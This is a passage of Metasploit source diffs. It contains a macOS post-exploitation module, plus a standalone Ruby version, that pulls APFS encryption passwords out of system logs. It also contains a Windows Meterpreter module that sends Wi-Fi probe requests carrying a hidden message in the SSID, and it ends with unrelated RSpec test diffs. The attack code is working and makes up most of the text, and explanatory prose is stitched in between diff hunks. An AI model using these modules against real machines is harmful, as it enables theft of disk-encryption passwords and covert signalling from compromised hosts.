        In OSX a normal user can use the 'log' command to view the system
        logs. In OSX 10.13 to 10.13.2 when a user creates an encrypted APFS
        volume the password is visible in plaintext within these logs.
      ),
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'URL', 'https://thehackernews.com/2018/03/macos-apfs-password.html' ],
          [ 'URL', 'https://www.mac4n6.com/blog/2018/3/21/uh-oh-unified-logs-in-high-sierra-1013-show-plaintext-password-for-apfs-encrypted-external-volumes-via-disk-utilityapp' ]
        ],
      'Platform'    => 'osx',
      'Arch'        => ARCH_ALL,
      'Author'      => [
        'Sarah Edwards', # earliest public discovery
        'cbrnrd'         # Metasploit module
      ],
      'SessionTypes' => [ 'shell', 'meterpreter' ],
      'Targets'     => [
        [ 'Mac OS X High Sierra (10.13.1, 10.13.2, 10.13.3)', { } ]
      ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Mar 21 2018'
    ))
    register_options([
      # The command doesn't give volume names, only mount paths (current or previous)
      OptString.new('MOUNT_PATH', [false, 'The mount path of the volume to get the password of (Leave blank for all)', ''])
    ])
  end

  def check
    osx_version = cmd_exec('sw_vers -productVersion')
    return Exploit::CheckCode::Vulnerable if osx_version =~ /^10\.13[\.[0-3]]?$/
    Exploit::CheckCode::Safe
  end

  def run
    if check == Exploit::CheckCode::Safe
      print_error "This version of OSX is not vulnerable"
      return
    end
    cmd = "log show --info --predicate 'eventMessage contains \"newfs_\"'"
    cmd << " | grep #{datastore['MOUNT_PATH']}" unless datastore['MOUNT_PATH'].empty?
    vprint_status "Running \"#{cmd}\" on target..."
    results = cmd_exec(cmd)
    vprint_status "Target results:\n#{results}"
    if results.empty?
      print_error 'Got no response from target. Stopping...'
    else
      successful_lines = 0
      results.lines.each do |l|
        next unless l =~ /newfs_apfs(.*)-S(.*)$/
        print_good "APFS command found: #{$&}"
        successful_lines += 1
      end
      print_error "No password(s) found for any volumes. Exiting..." if successful_lines.zero?
    end
  end
end
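Outside the framework, the same check can be reproduced directly on a macOS host. This sketch shells out to the same `log show` query and applies the module's regex; it assumes local shell access on a 10.13.0-10.13.2 system and will simply print nothing on a patched one.

```ruby
# Run the unified-log query used by the module and scan its output for
# newfs_apfs invocations that carry a -S (passphrase) argument.
cmd = %q{log show --info --predicate 'eventMessage contains "newfs_"'}
output = `#{cmd}`

output.lines.each do |line|
  next unless line =~ /newfs_apfs(.*)-S(.*)$/
  puts "APFS command found: #{$&}"
end
```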
@@ -0,0 +1,143 @@ (new file; all lines added)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post

  def initialize(info={})
    super( update_info( info,
      'Name'         => 'Windows Send Probe Request Packets',
      'Description'  => %q{
        This module sends probe requests through the wlan interface.
        The ESSID field is used to carry a custom message.
      },
      'License'      => MSF_LICENSE,
      'Author'       => [ 'bmerinofe@gmail.com' ],
      'Platform'     => [ 'win' ],
      'SessionTypes' => [ 'meterpreter' ]
    ))

    register_options(
      [
        OptString.new('SSID', [true, 'Message to be embedded in the SSID field', '']),
        OptInt.new('TIMEOUT', [false, 'Timeout in seconds running probes', '30'])
      ])
  end

  def run
    ssid = datastore['SSID']
    time = datastore['TIMEOUT']

    if ssid.length > 32
      print_error("The SSID must be equal to or less than 32 bytes")
      return
    end

    mypid = client.sys.process.getpid
    @host_process = client.sys.process.open(mypid, PROCESS_ALL_ACCESS)
    @wlanapi = client.railgun.wlanapi

    wlan_handle = open_handle()
    unless wlan_handle
      print_error("Couldn't open WlanAPI Handle. WLAN API may not be installed on target")
      print_error("On Windows XP this could also mean the Wireless Zero Configuration Service is turned off")
      return
    end

    # typedef struct _DOT11_SSID {
    #   ULONG uSSIDLength;
    #   UCHAR ucSSID[DOT11_SSID_MAX_LENGTH];
    # } DOT11_SSID, *PDOT11_SSID;
    pDot11Ssid = [ssid.length].pack("L<") << ssid
    wlan_iflist = enum_interfaces(wlan_handle)
    if wlan_iflist.length == 0
      print_status("Wlan interfaces not found")
      return
    end

    print_status("Wlan interfaces found: #{wlan_iflist.length}")
    print_status("Sending probe requests for #{time} seconds")
    begin
      ::Timeout.timeout(time) do
        while true
          wlan_iflist.each do |interface|
            vprint_status("Interface Guid: #{interface['guid'].unpack('H*')[0]}")
            vprint_status("Interface State: #{interface['state']}")
            vprint_status("DOT11_SSID payload: #{pDot11Ssid.chars.map {|c| c.ord.to_s(16) }.join(':')}")
            @wlanapi.WlanScan(wlan_handle,interface['guid'],pDot11Ssid,nil,nil)
            sleep(10)
          end
        end
      end
    rescue ::Timeout::Error
      closehandle = @wlanapi.WlanCloseHandle(wlan_handle,nil)
      if closehandle['return'] == 0
        print_status("WlanAPI Handle closed successfully")
      else
        print_error("There was an error closing the Handle")
      end
    end
  end

  # Function borrowed from @theLightCosine wlan_* modules
  def open_handle
    begin
      wlhandle = @wlanapi.WlanOpenHandle(2,nil,4,4)
    rescue
      return nil
    end
    return wlhandle['phClientHandle']
  end

  # Function borrowed from @theLightCosine wlan_* modules
  def enum_interfaces(wlan_handle)

    iflist = @wlanapi.WlanEnumInterfaces(wlan_handle,nil,4)
    pointer= iflist['ppInterfaceList']

    numifs = @host_process.memory.read(pointer,4)
    numifs = numifs.unpack("V")[0]

    interfaces = []

    # Set the pointer ahead to the first element in the array
    pointer = (pointer + 8)
    (1..numifs).each do |i|
      interface = {}
      # Read the GUID (16 bytes)
      interface['guid'] = @host_process.memory.read(pointer,16)
      pointer = (pointer + 16)
      # Read the description (up to 512 bytes)
      interface['description'] = @host_process.memory.read(pointer,512)
      pointer = (pointer + 512)
      # Read the state of the interface (4 bytes)
      state = @host_process.memory.read(pointer,4)
      pointer = (pointer + 4)
      # Turn the state into human readable form
      state = state.unpack("V")[0]
      case state
      when 0
        interface['state'] = "The interface is not ready to operate."
      when 1
        interface['state'] = "The interface is connected to a network."
      when 2
        interface['state'] = "The interface is the first node in an ad hoc network. No peer has connected."
      when 3
        interface['state'] = "The interface is disconnecting from the current network."
      when 4
        interface['state'] = "The interface is not connected to any network."
      when 5
        interface['state'] = "The interface is attempting to associate with a network."
      when 6
        interface['state'] = "Auto configuration is discovering the settings for the network."
      when 7
        interface['state'] = "The interface is in the process of authenticating."
      else
        interface['state'] = "Unknown State"
      end
      interfaces << interface
    end
    return interfaces
  end
end
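The only non-obvious piece above is the DOT11_SSID structure passed to WlanScan. Here is the same packing shown standalone so the byte layout is visible; the SSID string is just an example.

```ruby
# DOT11_SSID: a little-endian ULONG length followed by up to 32 SSID bytes,
# exactly as the module builds it before handing it to railgun's WlanScan.
ssid = 'FREE_COFFEE'
raise 'SSID too long' if ssid.bytesize > 32

p_dot11_ssid = [ssid.bytesize].pack('L<') << ssid

puts p_dot11_ssid.bytes.map { |b| format('%02x', b) }.join(':')
```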
@@ -51,7 +51,6 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Db do
   it { is_expected.to respond_to :db_parse_db_uri_postgresql }
   it { is_expected.to respond_to :deprecated_commands }
   it { is_expected.to respond_to :each_host_range_chunk }
-  it { is_expected.to respond_to :make_sortable }
   it { is_expected.to respond_to :name }
   it { is_expected.to respond_to :set_rhosts_from_addrs }

@@ -173,16 +172,16 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Db do
   " -a,--add Add a note to the list of addresses, instead of listing",
   " -d,--delete Delete the hosts instead of searching",
   " -n,--note <data> Set the data for a new note (only with -a)",
-  " -t <type1,type2> Search for a list of types",
+  " -t,--type <type1,type2> Search for a list of types, or set single type for add",
   " -h,--help Show this help information",
   " -R,--rhosts Set RHOSTS from the results of the search",
-  " -S,--search Regular expression to match for search",
+  " -S,--search Search string to filter by",
   " -o,--output Save the notes to a csv file",
-  " --sort <field1,field2> Fields to sort by (case sensitive)",
+  " -O <column> Order rows by specified column number",
   "Examples:",
   " notes --add -t apps -n 'winzip' 10.1.1.34 10.1.20.41",
   " notes -t smb.fingerprint 10.1.1.34 10.1.20.41",
-  " notes -S 'nmap.nse.(http|rtsp)' --sort type,output"
+  " notes -S 'nmap.nse.(http|rtsp)'"
   ]

   end

@@ -341,7 +340,8 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Db do
   expect(@output).to match_array [
     "Added workspace: foo",
     "Added workspace: bar",
-    "Added workspace: baf"
+    "Added workspace: baf",
+    "Workspace: baf"
   ]
   end
   end

@@ -349,25 +349,18 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Db do
   describe "-d" do
     it "should delete a workspace" do
       db.cmd_workspace("-a", "foo")
-      @output = []
+      expect(framework.db.find_workspace("foo")).not_to be_nil
       db.cmd_workspace("-d", "foo")
-      expect(@output).to match_array [
-        "Deleted workspace: foo",
-        "Switched workspace: default"
-      ]
+      expect(framework.db.find_workspace("foo")).to be_nil
     end
   end

   describe "-D" do
     it "should delete all workspaces" do
       db.cmd_workspace("-a", "foo")
-      @output = []
+      expect(framework.db.workspaces.size).to be > 1
       db.cmd_workspace("-D")
-      expect(@output).to match_array [
-        "Deleted and recreated the default workspace",
-        "Deleted workspace: foo",
-        "Switched workspace: default"
-      ]
+      expect(framework.db.workspaces.size).to eq 1
     end
   end

@@ -6,5 +6,4 @@ RSpec.shared_examples_for 'Msf::DBManager::Host' do
   it { is_expected.to respond_to :has_host? }
   it { is_expected.to respond_to :hosts }
   it { is_expected.to respond_to :report_host }
-  it { is_expected.to respond_to :update_host_via_sysinfo }
 end

@@ -1,5 +1,4 @@
 RSpec.shared_examples_for 'Msf::DBManager::Loot' do
-  it { is_expected.to respond_to :each_loot }
   it { is_expected.to respond_to :find_or_create_loot }
   it { is_expected.to respond_to :loots }
   it { is_expected.to respond_to :report_loot }